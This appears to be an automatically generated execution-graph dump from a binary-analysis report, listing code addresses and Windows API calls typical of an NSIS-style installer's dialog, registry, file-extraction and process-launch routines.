                                                                                                                            execution_graph 2697 403a41 2698 403b94 2697->2698 2699 403a59 2697->2699 2701 403be5 2698->2701 2702 403ba5 GetDlgItem GetDlgItem 2698->2702 2699->2698 2700 403a65 2699->2700 2703 403a70 SetWindowPos 2700->2703 2704 403a83 2700->2704 2706 403c3f 2701->2706 2714 401389 2 API calls 2701->2714 2705 403f14 19 API calls 2702->2705 2703->2704 2708 403aa0 2704->2708 2709 403a88 ShowWindow 2704->2709 2710 403bcf SetClassLongA 2705->2710 2715 403b8f 2706->2715 2767 403f60 2706->2767 2711 403ac2 2708->2711 2712 403aa8 DestroyWindow 2708->2712 2709->2708 2713 40140b 2 API calls 2710->2713 2717 403ac7 SetWindowLongA 2711->2717 2718 403ad8 2711->2718 2716 403e9d 2712->2716 2713->2701 2719 403c17 2714->2719 2716->2715 2726 403ece ShowWindow 2716->2726 2717->2715 2722 403b81 2718->2722 2723 403ae4 GetDlgItem 2718->2723 2719->2706 2724 403c1b SendMessageA 2719->2724 2720 40140b 2 API calls 2738 403c51 2720->2738 2721 403e9f DestroyWindow EndDialog 2721->2716 2804 403f7b 2722->2804 2727 403b14 2723->2727 2728 403af7 SendMessageA IsWindowEnabled 2723->2728 2724->2715 2726->2715 2730 403b21 2727->2730 2731 403b68 SendMessageA 2727->2731 2732 403b34 2727->2732 2741 403b19 2727->2741 2728->2715 2728->2727 2730->2731 2730->2741 2731->2722 2735 403b51 2732->2735 2736 403b3c 2732->2736 2734 403f14 19 API calls 2734->2738 2740 40140b 2 API calls 2735->2740 2798 40140b 2736->2798 2737 403b4f 2737->2722 2738->2715 2738->2720 2738->2721 2738->2734 2758 403ddf DestroyWindow 2738->2758 2770 405d51 2738->2770 2788 403f14 2738->2788 2742 403b58 2740->2742 2801 403eed 2741->2801 2742->2722 2742->2741 2744 403ccc GetDlgItem 2745 403ce1 2744->2745 2746 403ce9 ShowWindow KiUserCallbackDispatcher 2744->2746 2745->2746 2791 403f36 EnableWindow 2746->2791 2748 403d13 EnableWindow 2751 403d27 2748->2751 2749 403d2c GetSystemMenu EnableMenuItem SendMessageA 2750 403d5c SendMessageA 2749->2750 2749->2751 2750->2751 2751->2749 2792 403f49 SendMessageA 2751->2792 2793 405d2f lstrcpynA 2751->2793 2754 403d8a lstrlenA 2755 405d51 18 API calls 2754->2755 2756 403d9b SetWindowTextA 2755->2756 2794 401389 2756->2794 2758->2716 2759 403df9 CreateDialogParamA 2758->2759 2759->2716 2760 403e2c 2759->2760 2761 403f14 19 API calls 2760->2761 2762 403e37 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2761->2762 2763 401389 2 API calls 2762->2763 2764 403e7d 2763->2764 2764->2715 2765 403e85 ShowWindow 2764->2765 2766 403f60 SendMessageA 2765->2766 2766->2716 2768 403f78 2767->2768 2769 403f69 SendMessageA 2767->2769 2768->2738 2769->2768 2775 405d5e 2770->2775 2771 405f81 2772 405f96 2771->2772 2834 405d2f lstrcpynA 2771->2834 2772->2738 2774 405dff GetVersion 2774->2775 2775->2771 2775->2774 2776 405f58 lstrlenA 2775->2776 2779 405d51 10 API calls 2775->2779 2781 405e77 GetSystemDirectoryA 2775->2781 2782 405e8a GetWindowsDirectoryA 2775->2782 2784 405ebe SHGetSpecialFolderLocation 2775->2784 2785 405d51 10 API calls 2775->2785 2786 405f01 lstrcatA 2775->2786 2818 405c16 RegOpenKeyExA 2775->2818 2823 405f9a 2775->2823 2832 405c8d wsprintfA 2775->2832 2833 405d2f lstrcpynA 2775->2833 2776->2775 2779->2776 2781->2775 2782->2775 2784->2775 2787 405ed6 SHGetPathFromIDListA CoTaskMemFree 2784->2787 2785->2775 2786->2775 2787->2775 2789 405d51 18 API calls 2788->2789 2790 403f1f SetDlgItemTextA 2789->2790 2790->2744 2791->2748 2792->2751 2793->2754 2795 401390 2794->2795 2796 4013fe 2795->2796 2797 4013cb MulDiv SendMessageA 2795->2797 2796->2738 2797->2795 2799 401389 2 API calls 2798->2799 2800 401420 2799->2800 2800->2741 2802 403ef4 2801->2802 2803 403efa SendMessageA 2801->2803 2802->2803 2803->2737 2805 403f93 GetWindowLongA 2804->2805 2815 40401c 2804->2815 2806 403fa4 2805->2806 2805->2815 2807 403fb3 GetSysColor 2806->2807 2808 403fb6 2806->2808 2807->2808 2809 403fc6 SetBkMode 2808->2809 2810 403fbc SetTextColor 2808->2810 2811 403fe4 2809->2811 2812 403fde GetSysColor 2809->2812 2810->2809 2813 403ff5 2811->2813 2814 403feb SetBkColor 2811->2814 2812->2811 2813->2815 2816 404008 DeleteObject 2813->2816 2817 40400f CreateBrushIndirect 2813->2817 2814->2813 2815->2715 2816->2817 2817->2815 2819 405c87 2818->2819 2820 405c49 RegQueryValueExA 2818->2820 2819->2775 2821 405c6a RegCloseKey 2820->2821 2821->2819 2830 405fa6 2823->2830 2824 40600e 2825 406012 CharPrevA 2824->2825 2828 40602d 2824->2828 2825->2824 2826 406003 CharNextA 2826->2824 2826->2830 2828->2775 2829 405ff1 CharNextA 2829->2830 2830->2824 2830->2826 2830->2829 2831 405ffe CharNextA 2830->2831 2835 4057cc 2830->2835 2831->2826 2832->2775 2833->2775 2834->2772 2836 4057d2 2835->2836 2837 4057e5 2836->2837 2838 4057d8 CharNextA 2836->2838 2837->2830 2838->2836 3651 401cc2 3652 402a1d 18 API calls 3651->3652 3653 401cd2 SetWindowLongA 3652->3653 3654 4028cf 3653->3654 3655 401a43 3656 402a1d 18 API calls 3655->3656 3657 401a49 3656->3657 3658 402a1d 18 API calls 3657->3658 3659 4019f3 3658->3659 2851 401e44 2852 402a3a 18 API calls 2851->2852 2853 401e4a 2852->2853 2867 404f48 2853->2867 2857 401eb0 CloseHandle 2859 4026a6 2857->2859 2858 401e5a 2858->2857 2858->2859 2860 401e79 WaitForSingleObject 2858->2860 2881 406104 2858->2881 2860->2858 2861 401e87 GetExitCodeProcess 2860->2861 2862 401ea4 2861->2862 2863 401e99 2861->2863 2862->2857 2866 401ea2 2862->2866 2885 405c8d wsprintfA 2863->2885 2866->2857 2868 401e54 2867->2868 2869 404f63 2867->2869 2878 4054c0 CreateProcessA 2868->2878 2870 404f80 lstrlenA 2869->2870 2871 405d51 18 API calls 2869->2871 2872 404fa9 2870->2872 2873 404f8e lstrlenA 2870->2873 2871->2870 2875 404fbc 2872->2875 2876 404faf SetWindowTextA 2872->2876 2873->2868 2874 404fa0 lstrcatA 2873->2874 2874->2872 2875->2868 2877 404fc2 SendMessageA SendMessageA SendMessageA 2875->2877 2876->2875 2877->2868 2879 4054f3 CloseHandle 2878->2879 2880 4054ff 2878->2880 2879->2880 2880->2858 2882 406121 PeekMessageA 2881->2882 2883 406131 2882->2883 2884 406117 DispatchMessageA 2882->2884 2883->2860 2884->2882 2885->2866 3660 402644 3661 40264a 3660->3661 3662 402652 FindClose 3661->3662 3663 4028cf 3661->3663 3662->3663 2934 4048c5 GetDlgItem GetDlgItem 2935 404917 7 API calls 2934->2935 2948 404b2f 2934->2948 2936 4049ba DeleteObject 2935->2936 2937 4049ad SendMessageA 2935->2937 2938 4049c3 2936->2938 2937->2936 2939 4049fa 2938->2939 2941 405d51 18 API calls 2938->2941 2943 403f14 19 API calls 2939->2943 2940 404c13 2944 404cbf 2940->2944 2951 404ea7 2940->2951 2956 404c6c SendMessageA 2940->2956 2945 4049dc SendMessageA SendMessageA 2941->2945 2942 404bf4 2942->2940 2953 404c05 SendMessageA 2942->2953 2950 404a0e 2943->2950 2946 404cd1 2944->2946 2947 404cc9 SendMessageA 2944->2947 2945->2938 2958 404ce3 ImageList_Destroy 2946->2958 2959 404cea 2946->2959 2966 404cfa 2946->2966 2947->2946 2948->2940 2948->2942 2949 404b8f 2948->2949 2990 404813 SendMessageA 2949->2990 2955 403f14 19 API calls 2950->2955 2952 403f7b 8 API calls 2951->2952 2957 404eb5 2952->2957 2953->2940 2971 404a1c 2955->2971 2956->2951 2961 404c81 SendMessageA 2956->2961 2958->2959 2962 404cf3 GlobalFree 2959->2962 2959->2966 2960 404e69 2960->2951 2967 404e7b ShowWindow GetDlgItem ShowWindow 2960->2967 2964 404c94 2961->2964 2962->2966 2963 404af0 GetWindowLongA SetWindowLongA 2965 404b09 2963->2965 2976 404ca5 SendMessageA 2964->2976 2968 404b27 2965->2968 2969 404b0f ShowWindow 2965->2969 2966->2960 2981 404d35 2966->2981 2995 404893 2966->2995 2967->2951 2989 403f49 SendMessageA 2968->2989 2988 403f49 SendMessageA 2969->2988 2970 404ba0 2970->2942 2971->2963 2972 404aea 2971->2972 2975 404a6b SendMessageA 2971->2975 2977 404aa7 SendMessageA 2971->2977 2978 404ab8 SendMessageA 2971->2978 2972->2963 2972->2965 2975->2971 2976->2944 2977->2971 2978->2971 2980 404b22 2980->2951 2982 404d79 2981->2982 2984 404d63 SendMessageA 2981->2984 2983 404e3f InvalidateRect 2982->2983 2987 404ded SendMessageA SendMessageA 2982->2987 2983->2960 2985 404e55 2983->2985 2984->2982 3004 4047ce 2985->3004 2987->2982 2988->2980 2989->2948 2991 404872 SendMessageA 2990->2991 2992 404836 GetMessagePos ScreenToClient SendMessageA 2990->2992 2993 40486a 2991->2993 2992->2993 2994 40486f 2992->2994 2993->2970 2994->2991 3007 405d2f lstrcpynA 2995->3007 2997 4048a6 3008 405c8d wsprintfA 2997->3008 2999 4048b0 3000 40140b 2 API calls 2999->3000 3001 4048b9 3000->3001 3009 405d2f lstrcpynA 3001->3009 3003 4048c0 3003->2981 3010 404709 3004->3010 3006 4047e3 3006->2960 3007->2997 3008->2999 3009->3003 3011 40471f 3010->3011 3012 405d51 18 API calls 3011->3012 3013 404783 3012->3013 3014 405d51 18 API calls 3013->3014 3015 40478e 3014->3015 3016 405d51 18 API calls 3015->3016 3017 4047a4 lstrlenA wsprintfA SetDlgItemTextA 3016->3017 3017->3006 3664 4026c6 3665 402a3a 18 API calls 3664->3665 3666 4026d4 3665->3666 3667 4026ea 3666->3667 3668 402a3a 18 API calls 3666->3668 3669 40597d 2 API calls 3667->3669 3668->3667 3670 4026f0 3669->3670 3692 4059a2 GetFileAttributesA CreateFileA 3670->3692 3672 4026fd 3673 4027a0 3672->3673 3674 402709 GlobalAlloc 3672->3674 3675 4027a8 DeleteFileA 3673->3675 3676 4027bb 3673->3676 3677 402722 3674->3677 3678 402797 CloseHandle 3674->3678 3675->3676 3693 4030c7 SetFilePointer 3677->3693 3678->3673 3680 402728 3681 4030b1 ReadFile 3680->3681 3682 402731 GlobalAlloc 3681->3682 3683 402741 3682->3683 3684 402775 3682->3684 3685 402e9f 32 API calls 3683->3685 3686 405a49 WriteFile 3684->3686 3691 40274e 3685->3691 3687 402781 GlobalFree 3686->3687 3688 402e9f 32 API calls 3687->3688 3689 402794 3688->3689 3689->3678 3690 40276c GlobalFree 3690->3684 3691->3690 3692->3672 3693->3680 3694 402847 3695 402a1d 18 API calls 3694->3695 3696 40284d 3695->3696 3697 40287e 3696->3697 3698 4026a6 3696->3698 3699 40285b 3696->3699 3697->3698 3700 405d51 18 API calls 3697->3700 3699->3698 3702 405c8d wsprintfA 3699->3702 3700->3698 3702->3698 3703 4022c7 3704 402a3a 18 API calls 3703->3704 3705 4022d8 3704->3705 3706 402a3a 18 API calls 3705->3706 3707 4022e1 3706->3707 3708 402a3a 18 API calls 3707->3708 3709 4022eb GetPrivateProfileStringA 3708->3709 3054 401bca 3055 402a1d 18 API calls 3054->3055 3056 401bd1 3055->3056 3057 402a1d 18 API calls 3056->3057 3058 401bdb 3057->3058 3059 401beb 3058->3059 3060 402a3a 18 API calls 3058->3060 3061 401bfb 3059->3061 3062 402a3a 18 API calls 3059->3062 3060->3059 3063 401c06 3061->3063 3064 401c4a 3061->3064 3062->3061 3065 402a1d 18 API calls 3063->3065 3066 402a3a 18 API calls 3064->3066 3067 401c0b 3065->3067 3068 401c4f 3066->3068 3069 402a1d 18 API calls 3067->3069 3070 402a3a 18 API calls 3068->3070 3071 401c14 3069->3071 3072 401c58 FindWindowExA 3070->3072 3073 401c3a SendMessageA 3071->3073 3074 401c1c SendMessageTimeoutA 3071->3074 3075 401c76 3072->3075 3073->3075 3074->3075 3491 401751 3492 402a3a 18 API calls 3491->3492 3493 401758 3492->3493 3494 401776 3493->3494 3495 40177e 3493->3495 3530 405d2f lstrcpynA 3494->3530 3531 405d2f lstrcpynA 3495->3531 3498 40177c 3502 405f9a 5 API calls 3498->3502 3499 401789 3500 4057a1 3 API calls 3499->3500 3501 40178f lstrcatA 3500->3501 3501->3498 3515 40179b 3502->3515 3503 406033 2 API calls 3503->3515 3504 40597d 2 API calls 3504->3515 3506 4017b2 CompareFileTime 3506->3515 3507 401876 3508 404f48 25 API calls 3507->3508 3510 401880 3508->3510 3509 404f48 25 API calls 3511 401862 3509->3511 3512 402e9f 32 API calls 3510->3512 3514 401893 3512->3514 3513 405d2f lstrcpynA 3513->3515 3516 4018a7 SetFileTime 3514->3516 3518 4018b9 CloseHandle 3514->3518 3515->3503 3515->3504 3515->3506 3515->3507 3515->3513 3517 405d51 18 API calls 3515->3517 3526 405525 MessageBoxIndirectA 3515->3526 3528 40184d 3515->3528 3529 4059a2 GetFileAttributesA CreateFileA 3515->3529 3516->3518 3517->3515 3518->3511 3519 4018ca 3518->3519 3520 4018e2 3519->3520 3521 4018cf 3519->3521 3522 405d51 18 API calls 3520->3522 3523 405d51 18 API calls 3521->3523 3525 4018ea 3522->3525 3524 4018d7 lstrcatA 3523->3524 3524->3525 3527 405525 MessageBoxIndirectA 3525->3527 3526->3515 3527->3511 3528->3509 3528->3511 3529->3515 3530->3498 3531->3499 3713 401651 3714 402a3a 18 API calls 3713->3714 3715 401657 3714->3715 3716 406033 2 API calls 3715->3716 3717 40165d 3716->3717 3718 401951 3719 402a1d 18 API calls 3718->3719 3720 401958 3719->3720 3721 402a1d 18 API calls 3720->3721 3722 401962 3721->3722 3723 402a3a 18 API calls 3722->3723 3724 40196b 3723->3724 3725 40197e lstrlenA 3724->3725 3730 4019b9 3724->3730 3726 401988 3725->3726 3726->3730 3731 405d2f lstrcpynA 3726->3731 3728 4019a2 3729 4019af lstrlenA 3728->3729 3728->3730 3729->3730 3731->3728 3532 404352 3533 40437e 3532->3533 3534 40438f 3532->3534 3601 405509 GetDlgItemTextA 3533->3601 3536 404407 3534->3536 3537 40439b GetDlgItem 3534->3537 3543 405d51 18 API calls 3536->3543 3554 4044de 3536->3554 3595 404688 3536->3595 3539 4043af 3537->3539 3538 404389 3540 405f9a 5 API calls 3538->3540 3541 4043c3 SetWindowTextA 3539->3541 3547 40583a 4 API calls 3539->3547 3540->3534 3545 403f14 19 API calls 3541->3545 3548 40446e SHBrowseForFolderA 3543->3548 3544 40450e 3549 40588f 18 API calls 3544->3549 3550 4043df 3545->3550 3546 403f7b 8 API calls 3551 40469c 3546->3551 3552 4043b9 3547->3552 3553 404486 CoTaskMemFree 3548->3553 3548->3554 3555 404514 3549->3555 3556 403f14 19 API calls 3550->3556 3552->3541 3559 4057a1 3 API calls 3552->3559 3557 4057a1 3 API calls 3553->3557 3554->3595 3599 405509 GetDlgItemTextA 3554->3599 3600 405d2f lstrcpynA 3555->3600 3558 4043ed 3556->3558 3560 404493 3557->3560 3598 403f49 SendMessageA 3558->3598 3559->3541 3563 4044ca SetDlgItemTextA 3560->3563 3568 405d51 18 API calls 3560->3568 3563->3554 3564 40452b 3566 4060c8 5 API calls 3564->3566 3565 4043f3 3567 4060c8 5 API calls 3565->3567 3577 404532 3566->3577 3569 4043fa 3567->3569 3570 4044b2 lstrcmpiA 3568->3570 3572 404402 SHAutoComplete 3569->3572 3569->3595 3570->3563 3574 4044c3 lstrcatA 3570->3574 3571 40456e 3602 405d2f lstrcpynA 3571->3602 3572->3536 3574->3563 3575 404541 GetDiskFreeSpaceExA 3575->3577 3585 4045c6 3575->3585 3576 404575 3578 40583a 4 API calls 3576->3578 3577->3571 3577->3575 3580 4057e8 2 API calls 3577->3580 3579 40457b 3578->3579 3581 404581 3579->3581 3582 404584 GetDiskFreeSpaceA 3579->3582 3580->3577 3581->3582 3583 40459f MulDiv 3582->3583 3582->3585 3583->3585 3584 404637 3587 40465a 3584->3587 3589 40140b 2 API calls 3584->3589 3585->3584 3586 4047ce 21 API calls 3585->3586 3588 404624 3586->3588 3603 403f36 EnableWindow 3587->3603 3591 404639 SetDlgItemTextA 3588->3591 3592 404629 3588->3592 3589->3587 3591->3584 3594 404709 21 API calls 3592->3594 3593 404676 3593->3595 3596 404683 3593->3596 3594->3584 3595->3546 3604 4042e7 3596->3604 3598->3565 3599->3544 3600->3564 3601->3538 3602->3576 3603->3593 3605 4042f5 3604->3605 3606 4042fa SendMessageA 3604->3606 3605->3606 3606->3595 3732 4019d2 3733 402a3a 18 API calls 3732->3733 3734 4019d9 3733->3734 3735 402a3a 18 API calls 3734->3735 3736 4019e2 3735->3736 3737 4019e9 lstrcmpiA 3736->3737 3738 4019fb lstrcmpA 3736->3738 3739 4019ef 3737->3739 3738->3739 3740 4021d2 3741 402a3a 18 API calls 3740->3741 3742 4021d8 3741->3742 3743 402a3a 18 API calls 3742->3743 3744 4021e1 3743->3744 3745 402a3a 18 API calls 3744->3745 3746 4021ea 3745->3746 3747 406033 2 API calls 3746->3747 3748 4021f3 3747->3748 3749 402204 lstrlenA lstrlenA 3748->3749 3753 4021f7 3748->3753 3750 404f48 25 API calls 3749->3750 3752 402240 SHFileOperationA 3750->3752 3751 404f48 25 API calls 3754 4021ff 3751->3754 3752->3753 3752->3754 3753->3751 3753->3754 3755 4014d6 3756 402a1d 18 API calls 3755->3756 3757 4014dc Sleep 3756->3757 3759 4028cf 3757->3759 3760 40155b 3761 401577 ShowWindow 3760->3761 3762 40157e 3760->3762 3761->3762 3763 40158c ShowWindow 3762->3763 3764 4028cf 3762->3764 3763->3764 3765 40255c 3766 402a1d 18 API calls 3765->3766 3769 402566 3766->3769 3767 4025d0 3768 405a1a ReadFile 3768->3769 3769->3767 3769->3768 3770 4025d2 3769->3770 3773 4025e2 3769->3773 3774 405c8d wsprintfA 3770->3774 3772 4025f8 SetFilePointer 3772->3767 3773->3767 3773->3772 3774->3767 3775 40405d 3776 404073 3775->3776 3781 40417f 3775->3781 3779 403f14 19 API calls 3776->3779 3777 4041ee 3778 4042c2 3777->3778 3780 4041f8 GetDlgItem 3777->3780 3786 403f7b 8 API calls 3778->3786 3782 4040c9 3779->3782 3783 404280 3780->3783 3784 40420e 3780->3784 3781->3777 3781->3778 3785 4041c3 GetDlgItem SendMessageA 3781->3785 3787 403f14 19 API calls 3782->3787 3783->3778 3789 404292 3783->3789 3784->3783 3788 404234 6 API calls 3784->3788 3806 403f36 EnableWindow 3785->3806 3791 4042bd 3786->3791 3792 4040d6 CheckDlgButton 3787->3792 3788->3783 3793 404298 SendMessageA 3789->3793 3794 4042a9 3789->3794 3804 403f36 EnableWindow 3792->3804 3793->3794 3794->3791 3798 4042af SendMessageA 3794->3798 3795 4041e9 3799 4042e7 SendMessageA 3795->3799 3797 4040f4 GetDlgItem 3805 403f49 SendMessageA 3797->3805 3798->3791 3799->3777 3801 40410a SendMessageA 3802 404131 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3801->3802 3803 404128 GetSysColor 3801->3803 3802->3791 3803->3802 3804->3797 3805->3801 3806->3795 3807 40205e 3808 402a3a 18 API calls 3807->3808 3809 402065 3808->3809 3810 402a3a 18 API calls 3809->3810 3811 40206f 3810->3811 3812 402a3a 18 API calls 3811->3812 3813 402079 3812->3813 3814 402a3a 18 API calls 3813->3814 3815 402083 3814->3815 3816 402a3a 18 API calls 3815->3816 3817 40208d 3816->3817 3818 4020cc CoCreateInstance 3817->3818 3819 402a3a 18 API calls 3817->3819 3822 4020eb 3818->3822 3824 402193 3818->3824 3819->3818 3820 401423 25 API calls 3821 4021c9 3820->3821 3823 402173 MultiByteToWideChar 3822->3823 3822->3824 3823->3824 3824->3820 3824->3821 3825 40265e 3826 402664 3825->3826 3827 402668 FindNextFileA 3826->3827 3829 40267a 3826->3829 3828 4026b9 3827->3828 3827->3829 3831 405d2f lstrcpynA 3828->3831 3831->3829 3832 401cde GetDlgItem GetClientRect 3833 402a3a 18 API calls 3832->3833 3834 401d0e LoadImageA SendMessageA 3833->3834 3835 401d2c DeleteObject 3834->3835 3836 4028cf 3834->3836 3835->3836 3837 401662 3838 402a3a 18 API calls 3837->3838 3839 401669 3838->3839 3840 402a3a 18 API calls 3839->3840 3841 401672 3840->3841 3842 402a3a 18 API calls 3841->3842 3843 40167b MoveFileA 3842->3843 3844 401687 3843->3844 3845 40168e 3843->3845 3847 401423 25 API calls 3844->3847 3846 406033 2 API calls 3845->3846 3849 4021c9 3845->3849 3848 40169d 3846->3848 3847->3849 3848->3849 3850 405bea 38 API calls 3848->3850 3850->3844 2886 402364 2887 40236a 2886->2887 2888 402a3a 18 API calls 2887->2888 2889 40237c 2888->2889 2890 402a3a 18 API calls 2889->2890 2891 402386 RegCreateKeyExA 2890->2891 2892 4023b0 2891->2892 2893 4028cf 2891->2893 2894 4023c8 2892->2894 2895 402a3a 18 API calls 2892->2895 2896 4023d4 2894->2896 2903 402a1d 2894->2903 2897 4023c1 lstrlenA 2895->2897 2899 4023ef RegSetValueExA 2896->2899 2906 402e9f 2896->2906 2897->2894 2900 402405 RegCloseKey 2899->2900 2900->2893 2904 405d51 18 API calls 2903->2904 2905 402a31 2904->2905 2905->2896 2907 402eb5 2906->2907 2908 402ee3 2907->2908 2931 4030c7 SetFilePointer 2907->2931 2926 4030b1 2908->2926 2912 402f00 GetTickCount 2915 403034 2912->2915 2922 402f4f 2912->2922 2913 40304a 2914 40308c 2913->2914 2919 40304e 2913->2919 2916 4030b1 ReadFile 2914->2916 2915->2899 2916->2915 2917 4030b1 ReadFile 2917->2922 2918 4030b1 ReadFile 2918->2919 2919->2915 2919->2918 2920 405a49 WriteFile 2919->2920 2920->2919 2921 402fa5 GetTickCount 2921->2922 2922->2915 2922->2917 2922->2921 2923 402fca MulDiv wsprintfA 2922->2923 2929 405a49 WriteFile 2922->2929 2924 404f48 25 API calls 2923->2924 2924->2922 2932 405a1a ReadFile 2926->2932 2930 405a67 2929->2930 2930->2922 2931->2908 2933 402eee 2932->2933 2933->2912 2933->2913 2933->2915 3851 401dea 3852 402a3a 18 API calls 3851->3852 3853 401df0 3852->3853 3854 402a3a 18 API calls 3853->3854 3855 401df9 3854->3855 3856 402a3a 18 API calls 3855->3856 3857 401e02 3856->3857 3858 402a3a 18 API calls 3857->3858 3859 401e0b 3858->3859 3860 401423 25 API calls 3859->3860 3861 401e12 ShellExecuteA 3860->3861 3862 401e3f 3861->3862 3863 40366d 3864 403678 3863->3864 3865 40367f GlobalAlloc 3864->3865 3866 40367c 3864->3866 3865->3866 3867 401eee 3868 402a3a 18 API calls 3867->3868 3869 401ef5 3868->3869 3870 4060c8 5 API calls 3869->3870 3871 401f04 3870->3871 3872 401f1c GlobalAlloc 3871->3872 3881 401f84 3871->3881 3873 401f30 3872->3873 3872->3881 3874 4060c8 5 API calls 3873->3874 3875 401f37 3874->3875 3876 4060c8 5 API calls 3875->3876 3877 401f41 3876->3877 3877->3881 3882 405c8d wsprintfA 3877->3882 3879 401f78 3883 405c8d wsprintfA 3879->3883 3882->3879 3883->3881 3884 4014f0 SetForegroundWindow 3885 4028cf 3884->3885 3891 4018f5 3892 40192c 3891->3892 3893 402a3a 18 API calls 3892->3893 3894 401931 3893->3894 3895 4055d1 69 API calls 3894->3895 3896 40193a 3895->3896 3897 4024f7 3898 402a3a 18 API calls 3897->3898 3899 4024fe 3898->3899 3902 4059a2 GetFileAttributesA CreateFileA 3899->3902 3901 40250a 3902->3901 3903 4018f8 3904 402a3a 18 API calls 3903->3904 3905 4018ff 3904->3905 3906 405525 MessageBoxIndirectA 3905->3906 3907 401908 3906->3907 3908 4014fe 3909 401506 3908->3909 3911 401519 3908->3911 3910 402a1d 18 API calls 3909->3910 3910->3911 3912 402b7f 3913 402ba7 3912->3913 3914 402b8e SetTimer 3912->3914 3915 402bfc 3913->3915 3916 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3913->3916 3914->3913 3916->3915 3917 401000 3918 401037 BeginPaint GetClientRect 3917->3918 3919 40100c DefWindowProcA 3917->3919 3921 4010f3 3918->3921 3922 401179 3919->3922 3923 401073 CreateBrushIndirect FillRect DeleteObject 3921->3923 3924 4010fc 3921->3924 3923->3921 3925 401102 CreateFontIndirectA 3924->3925 3926 401167 EndPaint 3924->3926 3925->3926 3927 401112 6 API calls 3925->3927 3926->3922 3927->3926 3928 401b02 3929 402a3a 18 API calls 3928->3929 3930 401b09 3929->3930 3931 402a1d 18 API calls 3930->3931 3932 401b12 wsprintfA 3931->3932 3933 4028cf 3932->3933 3934 402482 3935 402b44 19 API calls 3934->3935 3936 40248c 3935->3936 3937 402a1d 18 API calls 3936->3937 3938 402495 3937->3938 3939 4024b8 RegEnumValueA 3938->3939 3940 4024ac RegEnumKeyA 3938->3940 3941 4026a6 3938->3941 3939->3941 3942 4024d1 RegCloseKey 3939->3942 3940->3942 3942->3941 2839 401a03 2845 402a3a 2839->2845 2842 401a20 2843 401a33 2842->2843 2844 401a25 lstrcmpA 2842->2844 2844->2843 2846 402a46 2845->2846 2847 405d51 18 API calls 2846->2847 2848 402a67 2847->2848 2849 401a0c ExpandEnvironmentStringsA 2848->2849 2850 405f9a 5 API calls 2848->2850 2849->2842 2849->2843 2850->2849 3944 402283 3945 402291 3944->3945 3946 40228b 3944->3946 3948 402a3a 18 API calls 3945->3948 3949 4022a1 3945->3949 3947 402a3a 18 API calls 3946->3947 3947->3945 3948->3949 3951 402a3a 18 API calls 3949->3951 3953 4022af 3949->3953 3950 402a3a 18 API calls 3952 4022b8 WritePrivateProfileStringA 3950->3952 3951->3953 3953->3950 3954 405086 3955 405231 3954->3955 3956 4050a8 GetDlgItem GetDlgItem GetDlgItem 3954->3956 3958 405261 3955->3958 3959 405239 GetDlgItem CreateThread CloseHandle 3955->3959 3999 403f49 SendMessageA 3956->3999 3961 4052b0 3958->3961 3962 405277 ShowWindow ShowWindow 3958->3962 3963 40528f 3958->3963 3959->3958 3960 405118 3966 40511f GetClientRect GetSystemMetrics SendMessageA SendMessageA 3960->3966 3965 403f7b 8 API calls 3961->3965 4001 403f49 SendMessageA 3962->4001 3964 4052ea 3963->3964 3968 4052c3 ShowWindow 3963->3968 3969 40529f 3963->3969 3964->3961 3975 4052f7 SendMessageA 3964->3975 3970 4052bc 3965->3970 3973 405171 SendMessageA SendMessageA 3966->3973 3974 40518d 3966->3974 3971 4052e3 3968->3971 3972 4052d5 3968->3972 3976 403eed SendMessageA 3969->3976 3978 403eed SendMessageA 3971->3978 3977 404f48 25 API calls 3972->3977 3973->3974 3979 4051a0 3974->3979 3980 405192 SendMessageA 3974->3980 3975->3970 3981 405310 CreatePopupMenu 3975->3981 3976->3961 3977->3971 3978->3964 3983 403f14 19 API calls 3979->3983 3980->3979 3982 405d51 18 API calls 3981->3982 3984 405320 AppendMenuA 3982->3984 3985 4051b0 3983->3985 3986 405351 TrackPopupMenu 3984->3986 3987 40533e GetWindowRect 3984->3987 3988 4051b9 ShowWindow 3985->3988 3989 4051ed GetDlgItem SendMessageA 3985->3989 3986->3970 3990 40536d 3986->3990 3987->3986 3991 4051dc 3988->3991 3992 4051cf ShowWindow 3988->3992 3989->3970 3993 405214 SendMessageA SendMessageA 3989->3993 3994 40538c SendMessageA 3990->3994 4000 403f49 SendMessageA 3991->4000 3992->3991 3993->3970 3994->3994 3995 4053a9 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3994->3995 3997 4053cb SendMessageA 3995->3997 3997->3997 3998 4053ed GlobalUnlock SetClipboardData CloseClipboard 3997->3998 3998->3970 3999->3960 4000->3989 4001->3963 3018 402308 3019 402338 3018->3019 3020 40230d 3018->3020 3022 402a3a 18 API calls 3019->3022 3031 402b44 3020->3031 3024 40233f 3022->3024 3023 402314 3025 40231e 3023->3025 3029 402357 3023->3029 3035 402a7a RegOpenKeyExA 3024->3035 3026 402a3a 18 API calls 3025->3026 3027 402325 RegDeleteValueA RegCloseKey 3026->3027 3027->3029 3032 402a3a 18 API calls 3031->3032 3033 402b5d 3032->3033 3034 402b6b RegOpenKeyExA 3033->3034 3034->3023 3040 402aa5 3035->3040 3044 402355 3035->3044 3036 402acb RegEnumKeyA 3037 402add RegCloseKey 3036->3037 3036->3040 3045 4060c8 GetModuleHandleA 3037->3045 3039 402b02 RegCloseKey 3039->3044 3040->3036 3040->3037 3040->3039 3041 402a7a 5 API calls 3040->3041 3041->3040 3043 402b1d RegDeleteKeyA 3043->3044 3044->3029 3046 4060e4 3045->3046 3047 4060ee GetProcAddress 3045->3047 3051 40605a GetSystemDirectoryA 3046->3051 3049 402aed 3047->3049 3049->3043 3049->3044 3050 4060ea 3050->3047 3050->3049 3052 40607c wsprintfA LoadLibraryExA 3051->3052 3052->3050 4002 402688 4003 402a3a 18 API calls 4002->4003 4004 40268f FindFirstFileA 4003->4004 4005 4026b2 4004->4005 4009 4026a2 4004->4009 4007 4026b9 4005->4007 4010 405c8d wsprintfA 4005->4010 4011 405d2f lstrcpynA 4007->4011 4010->4007 4011->4009 4012 401c8a 4013 402a1d 18 API calls 4012->4013 4014 401c90 IsWindow 4013->4014 4015 4019f3 4014->4015 4016 40430b 4017 404341 4016->4017 4018 40431b 4016->4018 4020 403f7b 8 API calls 4017->4020 4019 403f14 19 API calls 4018->4019 4021 404328 SetDlgItemTextA 4019->4021 4022 40434d 4020->4022 4021->4017 3204 40310f SetErrorMode GetVersion 3205 403146 3204->3205 3206 40314c 3204->3206 3207 4060c8 5 API calls 3205->3207 3208 40605a 3 API calls 3206->3208 3207->3206 